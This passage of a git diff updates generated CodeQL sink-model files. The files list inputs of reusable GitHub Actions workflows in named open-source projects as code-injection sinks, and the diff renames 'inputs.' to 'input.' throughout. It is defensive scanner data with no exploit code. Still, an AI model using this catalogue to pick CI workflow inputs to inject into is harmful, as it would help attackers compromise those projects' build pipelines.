["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", 
"input.test-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.visual-studio-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.visual-studio-components", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "input.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.cmake-generator", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.cmake-platform", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.cmake-toolchain", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.extra-choco-packages", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.visual-studio-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.visual-studio-components", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", 
"input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "input.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "input.clang-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml index 028210d4eac..9887b8e5f3a 100644 --- a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cgal/cgal/.github/workflows/send_email.yml", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file + - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml index 2ea83d9d94b..4c6379fd94b 100644 --- a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-update-github-page.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-update-github-io.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-publish-releasenotes-twitter.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-new-milestone-and-issues-in-other-repos.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-maven-prepare.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-maven-perform.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-copy-github-io-to-sourceforge.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-github-page.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-github-io.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-publish-releasenotes-twitter.yml", "*", "input.version", 
"code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-new-milestone-and-issues-in-other-repos.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-maven-prepare.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-maven-perform.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-copy-github-io-to-sourceforge.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml index 69f1b740c96..35738fe6c0f 100644 --- a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "inputs.docker-context", "code-injection", "generated"] - - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "inputs.image_subpath", "code-injection", "generated"] \ No newline at end of file + - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] + - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.image_subpath", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml index 61af1d32441..77db768cf32 100644 --- a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "inputs.scala", "code-injection", "generated"] - - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "inputs.circt", "code-injection", "generated"] \ No newline at end of file + - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] + - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.circt", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml index 1532fc723aa..509de954646 100644 --- a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.test_name", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.run_command", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.working-directory", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.additional_envs", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.test_name", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.run_command", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.working-directory", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.additional_envs", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_docker.yml", "*", "inputs.set_latest", "code-injection", "generated"] \ No newline at end of file + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.run_command", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.working-directory", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.additional_envs", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.test_name", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", 
"input.run_command", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.working-directory", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.additional_envs", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_docker.yml", "*", "input.set_latest", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml index f4a7cd26183..6e0e2865e83 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml index 119bfeaa796..175012c10c9 100644 --- a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.nox_session_test_sim", "code-injection", "generated"] - - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.nox_session_test_nosim", "code-injection", "generated"] - - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.group", "code-injection", "generated"] \ No newline at end of file + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_nosim", "code-injection", "generated"] + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.group", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml index 10ea343b7aa..84a834d9a1f 100644 --- a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "inputs.extra-composer-options", "code-injection", "generated"] - - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "inputs.php-version", "code-injection", "generated"] - - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "inputs.extra-composer-options", "code-injection", "generated"] - - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "inputs.php-version", "code-injection", "generated"] \ No newline at end of file + - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.php-version", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "input.php-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml index 6310b7155d3..2946a78cf83 100644 --- a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "inputs.millargs", "code-injection", "generated"] - - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "inputs.buildcmd", "code-injection", "generated"] \ No newline at end of file + - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] + - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.buildcmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml index a1de7e9a8f9..7ce68d84ca5 100644 --- a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml 
@@ -3,15 +3,15 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.upgrade-plan-name", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-upgrade-tag", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-type", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-tag", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-image", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-b-tag", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-a-tag", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-image", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.test", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.test-entry-point", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "inputs.test-suite", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "inputs.test-file-directory", "code-injection", "generated"] \ No newline at end of file + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-upgrade-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", 
"input.relayer-type", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.relayer-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.relayer-image", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-b-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-a-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-image", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.test", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.test-entry-point", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "input.test-suite", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "input.test-file-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml index d6e334573e4..8e3b9ccc0f8 100644 --- a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "inputs.latest", "code-injection", "generated"] - - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "inputs.image_version", "code-injection", "generated"] \ No newline at end of file + - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] + - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.image_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml index eeff97a8aea..f41e2ee1246 100644 --- a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "inputs.version", "code-injection", "generated"] - - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "inputs.url", "code-injection", "generated"] \ No newline at end of file + - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] + - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "input.url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml index 34ffd6788b1..c643a6a9fe0 100644 --- a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "inputs.pr-number", "code-injection", "generated"] - - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "inputs.build-type", "code-injection", "generated"] \ No newline at end of file + - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] + - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.build-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml index 8ee00d47f79..9aad213b1df 100644 --- a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "inputs.name", "code-injection", "generated"] - - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "inputs.tag_name", "code-injection", "generated"] - - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "inputs.all_platforms", "code-injection", "generated"] - - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "inputs.num_shards", "code-injection", "generated"] \ No newline at end of file + - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.tag_name", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "input.all_platforms", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "input.num_shards", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml index 40b35b5c873..1906ef45379 100644 --- a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "inputs.mage-targets", "code-injection", "generated"] - - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "inputs.dev-engine", "code-injection", "generated"] \ No newline at end of file + - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] + - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.dev-engine", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml index c02368b5d51..f5ce50243f7 100644 --- a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "inputs.deploy_path", "code-injection", "generated"] - - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "inputs.envname", "code-injection", "generated"] \ No newline at end of file + - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] + - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.envname", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml index 61b3e84b29e..58c30f3cd02 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "inputs.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file + - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml index 72e4a3eec65..d6c0ced50a6 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "inputs.ddtrace-version", "code-injection", "generated"] - - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file + - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] + - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml index 5e875442771..fdcb8775dad 100644 --- a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "inputs.run_id", "code-injection", "generated"] - - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "inputs.source_id", "code-injection", "generated"] \ No newline at end of file + - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] + - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.source_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml index 991743df7d2..66889d2cf42 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.s3_bucket_name", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.build_script_path", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.env_setup_script_path", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.sha", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.package_test_command", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.env_setup_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", 
"input.sha", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.package_test_command", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml index 780d95fab47..e5c5cfeabd3 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] - - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] - - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] - - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", 